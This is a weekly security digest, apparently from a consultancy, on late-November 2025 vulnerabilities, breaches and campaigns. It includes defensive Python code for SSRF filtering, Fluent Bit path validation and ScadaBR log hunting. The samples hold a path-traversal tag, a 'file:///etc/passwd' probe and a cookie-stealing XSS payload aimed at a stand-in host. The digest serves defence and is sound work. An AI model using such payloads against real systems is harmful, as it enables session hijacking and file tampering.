The week of November 24–30, 2025 saw a wave of high-impact security developments across cloud, AI, IAM, and industrial environments. Critical vulnerabilities were disclosed in NVIDIA’s NeMo Agent Toolkit, Fluent Bit, and Apache Syncope, exposing organizations to server-side request forgery, remote code execution, and credential compromise. At the same time, third‑party breaches at OpenAI’s analytics provider and Gainsight’s Salesforce integration underscored the risks of SaaS and ecosystem dependencies. Rounding out the week, large-scale phishing and gaming-related attacks, the emergence of the Albiriox Android banking RAT, and active exploitation of an ICS XSS flaw highlighted how attackers are simultaneously targeting consumers, financial platforms, and industrial systems, demanding urgent patching, monitoring, and strengthened third‑party risk management.
1. Critical Vulnerabilities
1.1 NVIDIA NeMo Agent Toolkit SSRF Vulnerability (CVE-2025-33203)
NVIDIA disclosed a high‑severity SSRF flaw (CVSS 7.6) in the NeMo Agent Toolkit UI for Web, affecting all versions prior to 1.3.0. An authenticated low‑privilege user can abuse the chat API to trigger unintended server‑side requests, leading to information disclosure and potential denial of service.
Action: Upgrade to NeMo Agent Toolkit v1.3.0 or later. Until the upgrade is in place, restrict the UI host's outbound network access so it cannot reach internal services or cloud metadata endpoints: the impact of an SSRF is bounded by what the server itself is allowed to reach.
Reference: https://nvidia.custhelp.com/app/answers/detail/a_id/5726
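The generic defence against the class of bug above is to validate any user-supplied URL before the server fetches it. The following guard is an added example written for this digest; it is not NVIDIA's code and says nothing about how the toolkit itself was fixed. It rejects non-HTTP schemes, URLs carrying credentials, and any host that is (or resolves to) a non-public address, including loopback, RFC 1918 space, IPv4-mapped IPv6 literals and the 169.254.169.254 metadata endpoint. The resolver is injectable so the check can run offline and so the same resolved address can be pinned for the actual request; the sample inputs are constructed.

```python
"""Outbound-URL guard against SSRF: added illustration, not NVIDIA's code."""
from __future__ import annotations

import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host: str) -> list[str]:
    """Default resolver: every A/AAAA answer for host from the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip: ipaddress.IPv4Address | ipaddress.IPv6Address) -> bool:
    """True only for globally routable unicast addresses.

    is_global is False for loopback, RFC 1918, link-local (which covers the
    169.254.169.254 cloud metadata endpoint), unspecified and reserved space.
    An IPv4-mapped IPv6 literal (::ffff:10.0.0.5) is judged by the embedded IPv4.
    """
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url: str, resolver=resolve_all) -> tuple[bool, str]:
    """Return (allowed, reason) for a user-supplied URL the server would fetch."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:  # e.g. malformed IPv6 bracket syntax
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        # Not an IP literal: resolve and judge every answer, so a name that
        # mixes public and private records is still rejected.
        try:
            addresses = [ipaddress.ip_address(a.split("%")[0]) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"could not resolve {host!r}: {exc}"
        if not addresses:
            return False, f"{host!r} resolved to no addresses"
    for ip in addresses:
        if not is_public_address(ip):
            return False, f"{host!r} -> {ip} is not a public address"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs; the lambda stands in for DNS so this runs offline.
    fake_dns = lambda host: ["93.184.216.34"]
    for candidate in (
        "https://example.com/docs",
        "http://169.254.169.254/latest/meta-data/",
        "http://127.0.0.1:8080/admin",
        "http://[::ffff:10.0.0.5]/",
        "file:///etc/passwd",
    ):
        print(candidate, check_outbound_url(candidate, resolver=fake_dns))
```

Two caveats the check alone does not cover: the fetch must not follow redirects automatically (re-run the check on every hop), and the connection should be made to the address that was validated rather than re-resolving the name, otherwise a DNS-rebinding attacker gets a second, unchecked answer.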
1.2 Fluent Bit: Multiple Vulnerabilities Enabling Cloud Takeover (CVE-2025-12972, CVE-2025-12970, CVE-2025-12978, CVE-2025-12977, CVE-2025-12969)
Oligo Security reported five vulnerabilities in Fluent Bit affecting releases before 4.1.1 and before 4.0.12, the most severe rated critical (CVSS 9.1). Across the set: a stack buffer overflow in the Docker input plugin, an authentication bypass in the forward input plugin, tag spoofing, and a path-traversal flaw in the file output plugin that turns an attacker-controlled tag into an arbitrary file write. Chained, they allow log manipulation and remote code execution on the logging host, which in cloud and Kubernetes deployments is usually a node-wide agent with access to every workload's logs.
Action: Upgrade Fluent Bit to 4.1.1 (4.1 branch) or 4.0.12 (4.0 branch). Fluent Bit is frequently embedded in Kubernetes DaemonSets, vendor logging agents and managed observability services, so check image tags and managed-service release notes, not only hosts you patch directly. Until the forward input is patched, restrict network access to it to trusted senders.
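Two of the findings above are easy to reason about in code: a tag used verbatim as a file name, and a version string that has to be compared per branch because the fix landed in two branches at once. The block below is an added illustration for this digest, not Fluent Bit's source or its actual fix. It shows the weak pattern (tag joined straight onto the output directory) beside a hardened one (allowlist the tag's characters, then prove the resolved path stays under the output root), plus a helper that judges `fluent-bit --version` output against the 4.0.12/4.1.1 fixes. The output directory, the tag alphabet and the assumption that branches after 4.1 carry the fixes are all mine.

```python
"""Fluent Bit hardening checks: added illustration, not Fluent Bit's own code."""
import os
import re

# Assumed output directory for the demo; a real deployment takes it from [OUTPUT].
OUTPUT_DIR = "/var/log/fluent-out"

# Assumed tag alphabet: letters, digits, '_', '-' and dots, never starting with a dot.
# No '/' or '\\' means no path separators, and a leading dot (so '.' and '..') is refused.
SAFE_TAG = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9_.-]{0,127}")


def unsafe_output_path(tag: str, output_dir: str = OUTPUT_DIR) -> str:
    """The weak pattern: the record's tag becomes the file name with no checks.

    Whoever can choose (or spoof) a tag can walk out of output_dir, and an
    absolute tag makes os.path.join discard output_dir entirely.
    """
    return os.path.join(output_dir, tag)


def is_safe_tag(tag: str) -> bool:
    """True if the tag is usable as a single file-name component."""
    return SAFE_TAG.fullmatch(tag) is not None


def safe_output_path(tag: str, output_dir: str = OUTPUT_DIR) -> str:
    """Build the path only from a validated tag, then prove it stays under output_dir."""
    if not is_safe_tag(tag):
        raise ValueError(f"rejected tag {tag!r}")
    root = os.path.realpath(output_dir)
    candidate = os.path.realpath(os.path.join(root, tag))
    # Defence in depth: even a validated tag must resolve inside root (symlinks etc.).
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"{candidate} escapes {root}")
    return candidate


# First patched release per branch, from the advisory.
FIXED = {(4, 0): (4, 0, 12), (4, 1): (4, 1, 1)}


def fluent_bit_is_patched(version_text: str) -> bool:
    """Judge 'fluent-bit --version' style output, e.g. 'Fluent Bit v4.0.11'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_text)
    if not m:
        raise ValueError(f"no version number in {version_text!r}")
    ver = tuple(int(x) for x in m.groups())
    branch = ver[:2]
    if branch in FIXED:
        return ver >= FIXED[branch]
    # Assumption: branches newer than 4.1 include the fixes; anything older than
    # 4.0 has no fixed release listed and is treated as vulnerable.
    return branch > (4, 1)


if __name__ == "__main__":
    evil = "../../../etc/cron.d/evil"  # constructed attacker-chosen tag
    print("unsafe:", os.path.normpath(unsafe_output_path(evil)))
    print("safe tag?", is_safe_tag(evil), is_safe_tag("app.nginx.access"))
    print("safe path:", safe_output_path("app.nginx.access"))
    for banner in ("Fluent Bit v4.0.11", "Fluent Bit v4.0.12", "Fluent Bit v4.1.0", "Fluent Bit v4.1.1"):
        print(banner, "patched" if fluent_bit_is_patched(banner) else "VULNERABLE")
```

Validating at the output side does not help if a trusted tag can be spoofed at ingress, which is why the tag-spoofing and forward-input issues matter even for deployments that never write attacker-named files: the fix is the patched release, and the checks above are for confirming exposure, not replacing it.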
1.3 Apache Syncope Hardcoded AES Key (CVE-2025-65998)
Apache Syncope 2.1.0 through 2.1.14, 3.0.0 through 3.0.14 and 4.0.0 through 4.0.2 use a hardcoded AES key for password storage when AES-based (reversible) password encryption is enabled (CVSS 7.5, High). Anyone with read access to the database, whether directly, through a backup, or via another flaw, can decrypt every password stored this way.
Action: Upgrade to Syncope 3.0.15 or 4.0.3 (no fixed 2.1.x release is listed, so 2.1 deployments need to move to a supported branch) and check whether AES password encryption was ever enabled. Values already stored under the hardcoded key remain decryptable by anyone who copied the database before the upgrade, so treat those passwords as exposed and rotate them.
Reference: https://syncope.apache.org/security.html
2. Notable Security Incidents
2.1 OpenAI User Metadata Exposure via Mixpanel Breach
A breach at OpenAI’s third‑party analytics provider Mixpanel exposed API user metadata (names, emails, OS, environment details, and account IDs). No passwords, payment data, chats, or API keys were exposed, but the leaked information raises phishing and targeted attack risk.
Action: Warn developers and API users that phishing lures may quote accurate details from this data (name, email, organisation and environment) to look legitimate; reinforce account hygiene and MFA, and treat any unexpected message claiming to be from OpenAI that asks for credentials or API keys as suspect.
Reference: https://openai.com/index/mixpanel-incident/
2.2 Gainsight–Salesforce OAuth Token Incident
Salesforce detected compromised OAuth tokens tied to Gainsight’s connected app and temporarily disabled the integration. Gainsight reports that only a small number of customers were affected and is providing direct support while investigations with external experts continue.
Action: Affected Salesforce/Gainsight customers should follow vendor guidance, revoke and re-issue any OAuth tokens and connected-app credentials, review the scopes the connected app was granted, and check Salesforce login and API access logs for activity through the integration during the exposure window.
3. Threat Landscape & Campaigns
3.1 Surge in Shopping and Gaming Phishing (Kaspersky)
Kaspersky blocked 6.39 million shopping-related phishing attempts from January–October 2025, with nearly half targeting online shoppers around major sales events. Over 20 million attacks hit gaming platforms, including 18.56 million malware detections via Discord, alongside significant phishing against Netflix and Spotify.
Action: Bolster seasonal fraud awareness; tighten controls around gaming/streaming services in corporate environments where applicable.
3.2 Albiriox: New Android RAT Targeting Finance & Crypto
Cleafy identified Albiriox, a MaaS Android RAT focused on on‑device banking and crypto fraud, using droppers (e.g., fake Penny Market app) and abusing Accessibility Services. It supports screen streaming, overlays, keylogging, and VNC-style remote control to bypass 2FA and perform real‑time fraudulent transactions.
Action: Strengthen mobile security controls (block sideloading through MDM and flag apps that request Accessibility Services), app vetting and user training; monitor for suspicious Android app installs and for banking sessions that appear to be driven remotely.
3.3 OpenPLC ScadaBR XSS Added to CISA KEV (CVE-2021-26829)
CISA added a long‑known ScadaBR XSS flaw to its Known Exploited Vulnerabilities catalog after confirming active exploitation in OpenPLC ScadaBR deployments. The bug affects system_settings.shtm in ScadaBR up to 1.12.4 (Windows) and 0.9.1 (Linux), enabling session hijacking and unauthorized configuration changes.
Action: Immediately patch or, where no fix is available, isolate affected ICS/SCADA systems so the ScadaBR web interface is reachable only from trusted engineering networks; FCEB agencies must remediate by 19 December 2025. Review any OEM products that embed ScadaBR components, and invalidate sessions and rotate credentials on systems that were exposed.
Reference: https://cybersecuritynews.com/cisa-openplc-scadabr-vulnerability/
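Because the flaw sits in a specific page, a first-pass hunt can be run over the HMI's web access logs: flag any request for system_settings.shtm that comes from outside the engineering network, or whose query string carries a script payload. The block below is an added example for this digest and not part of the CISA entry or of ScadaBR; the log lines are constructed in Common Log Format, the /ScadaBR/ context path, the trusted 10.10.0.0/16 range and the query parameter in the payload line are all assumptions, and the payload is a generic cookie-exfiltration string rather than the actual exploit.

```python
"""Hunt for XSS attempts against ScadaBR's system_settings.shtm in web access logs.
Added illustration with constructed sample lines; not part of the advisory or ScadaBR."""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import unquote_plus

# Assumption: the HMI should only be reached from these engineering/OT ranges.
TRUSTED_NETS = [ipaddress.ip_network("10.10.0.0/16")]

# Common Log Format: client, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Crude but useful markers once the query string has been URL-decoded.
XSS_MARKERS = ("<script", "javascript:", "onerror=", "onload=", "<img", "<svg")

# Constructed sample log (context path, addresses and payload are assumptions).
SAMPLE_LOG = """\
10.10.4.7 - - [25/Nov/2025:09:12:01 +0400] "GET /ScadaBR/system_settings.shtm HTTP/1.1" 200 5120
10.10.4.7 - - [25/Nov/2025:09:12:30 +0400] "POST /ScadaBR/system_settings.shtm HTTP/1.1" 200 3010
198.51.100.23 - - [25/Nov/2025:09:15:44 +0400] "GET /ScadaBR/system_settings.shtm HTTP/1.1" 200 5120
198.51.100.23 - - [25/Nov/2025:09:16:02 +0400] "GET /ScadaBR/system_settings.shtm?x=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F198.51.100.23%2F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 5120
10.10.4.9 - - [25/Nov/2025:09:20:11 +0400] "GET /ScadaBR/login.htm HTTP/1.1" 200 2000
"""


def analyse_line(line: str) -> dict | None:
    """Return a finding record for a system_settings.shtm request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"]
    if not path.partition("?")[0].lower().endswith("/system_settings.shtm"):
        return None
    findings = []
    client = ipaddress.ip_address(m["client"])
    if not any(client in net for net in TRUSTED_NETS):
        findings.append("untrusted source")
    # Decode twice so a double-encoded payload is still visible.
    query = unquote_plus(unquote_plus(path.partition("?")[2])).lower()
    if any(marker in query for marker in XSS_MARKERS):
        findings.append("script payload in query")
    return {"client": str(client), "ts": m["ts"], "method": m["method"],
            "path": path, "findings": findings}


def hunt(lines) -> list[dict]:
    """Keep only system_settings.shtm requests that raised at least one finding."""
    return [rec for line in lines if (rec := analyse_line(line)) and rec["findings"]]


if __name__ == "__main__":
    for rec in hunt(SAMPLE_LOG.splitlines()):
        print(rec["ts"], rec["client"], rec["method"], ", ".join(rec["findings"]))
```

The source-based rule is the one that matters most: a payload delivered in a POST body never appears in an access log, so the second sample line (a POST to the settings page) is only distinguishable from an attack by where it came from. Anything from outside the engineering network touching this page on an unpatched system should be treated as a probable exploitation attempt.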
Cyber resilience is more vital than ever—share to spread awareness and stay protected.
Stay secure. Stay informed.
From Crowe UAE Cyber Threat Management Services